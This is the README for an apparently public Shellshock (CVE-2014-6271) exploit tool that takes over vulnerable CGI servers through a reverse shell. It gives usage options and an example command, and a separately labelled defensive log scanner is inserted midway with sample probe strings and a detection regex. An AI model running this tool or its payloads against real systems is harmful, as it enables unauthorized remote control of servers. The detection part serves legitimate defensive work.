The Shellshock Exploit is a tool designed to efficiently exploit the Shellshock vulnerability (CVE-2014-6271) in susceptible CGI servers, enabling a precise takeover of the target server. Shellshock is a critical security vulnerability that affects the Bash shell, allowing attackers to execute arbitrary commands on the targeted system.
- Exploit Automation: Automates the exploitation of the Shellshock vulnerability in CGI scripts, streamlining the process for penetration testing and security research.
- Reverse Shell Connectivity: Provides options for establishing a reverse shell connection to the target server, supporting various methods such as Netcat (nc), TCP, and PHP.
- Customizable Options: Allows users to specify the target host, CGI script, remote host for the reverse shell, port, and preferred shell method through command-line options.
- CVE Number: CVE-2014-6271
- CVE Description: Bash through 4.3 allows remote attackers to execute arbitrary commands via crafted environment variables passed to Bash scripts.
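For defenders, the CVE description above translates into a simple log hunt: a client-controlled field whose value contains the Bash function-definition prefix `() {`. The following is an added example, not part of this project's code; the log lines are constructed samples and the names `scan`, `SAMPLE_LOG` and `FUNC_PREFIX` are hypothetical.

```python
import re

# Bash treats an environment value that begins with "() {" as a function
# definition. CGI servers copy request headers into HTTP_* variables, so that
# prefix in a logged, client-controlled field is the indicator to hunt for.
FUNC_PREFIX = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" format; quoted fields may contain escaped quotes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_LINE = re.compile(
    r'(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)
FIELDS = ("request", "referer", "agent")

# Constructed sample lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2014:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Oct/2014:10:00:05 +0000] "GET /cgi/test HTTP/1.1" 200 17 "-" "() { :; }; echo constructed-probe"',
    '198.51.100.7 - - [01/Oct/2014:10:00:09 +0000] "GET /cgi/test HTTP/1.1" 500 0 "() { x;}; echo constructed-probe" "curl/7.38.0"',
    '192.0.2.44 - - [01/Oct/2014:10:01:00 +0000] "GET /search?q=f() HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return one finding per log line that carries the prefix in a logged field."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if m is None:
            continue  # not combined format; route to a separate parser in real use
        ip, request, status, referer, agent = m.groups()
        values = dict(zip(FIELDS, (request, referer, agent)))
        hits = [name for name in FIELDS if FUNC_PREFIX.search(values[name])]
        if hits:
            findings.append(
                {"line": lineno, "ip": ip, "status": int(status), "fields": hits}
            )
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The combined log format records only the request line, Referer and User-Agent, so a value carried in any other header (Cookie, for example) is invisible to this scan unless the server is configured to log it.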
Debian/Ubuntu

```bash
sudo apt-get install libcurl4-openssl-dev
```

Red Hat/Fedora

```bash
sudo dnf install libcurl-devel
```

macOS (Homebrew)

```bash
brew install curl-openssl
```

After installing the libcurl development package, install CVE-2014-6271-Shellshock:

```bash
git clone https://github.com/MY7H404/CVE-2014-6271-Shellshock.git
cd CVE-2014-6271-Shellshock
pip3 install -r requirements.txt
```

```bash
python3 shellshock.py [-h] -a HOST -u URI -r REMOTE -p PORT [-s {nc,tcp,php}]
```

Warning
Fixing "error: externally-managed-environment" Pip3 Installation Error

```bash
pip3 install virtualenv
python3 -m venv myenv
source myenv/bin/activate
pip3 install -r requirements.txt
```

- `-h`, `--help`: Show help message and exit
- `-a HOST`, `--host HOST`: Specify a remote host to test
- `-u URI`, `--uri URI`: Specify a CGI script to test (e.g., `/cgi/test`)
- `-r REMOTE`, `--remote REMOTE`: Specify the host for the reverse shell connection
- `-p PORT`, `--port PORT`: Specify the port for the reverse shell connection
- `-s {nc,tcp,php}`, `--shell {nc,tcp,php}`: Choose your preferred reverse shell method for seamless connectivity (default `nc`)

```bash
python3 shellshock.py -a 10.10.10.10 -u /cgi/test -r localhost -p 4444 -s tcp
```

This tool is created for educational and testing purposes only. The authors and contributors are not responsible for any illegal, unethical, or unauthorized use of this tool. Users are solely responsible for ensuring that their use of this tool complies with all applicable laws, regulations, and ethical standards.
Usage of this tool on systems or networks without explicit authorization is strictly prohibited. The authors and contributors disclaim any responsibility for any damage, loss of data, or other consequences resulting from the use of this tool.
By using this tool, you acknowledge that you have read, understood, and agree to abide by the terms of this disclaimer.
Use responsibly and ethically.
This project is licensed under the MIT License.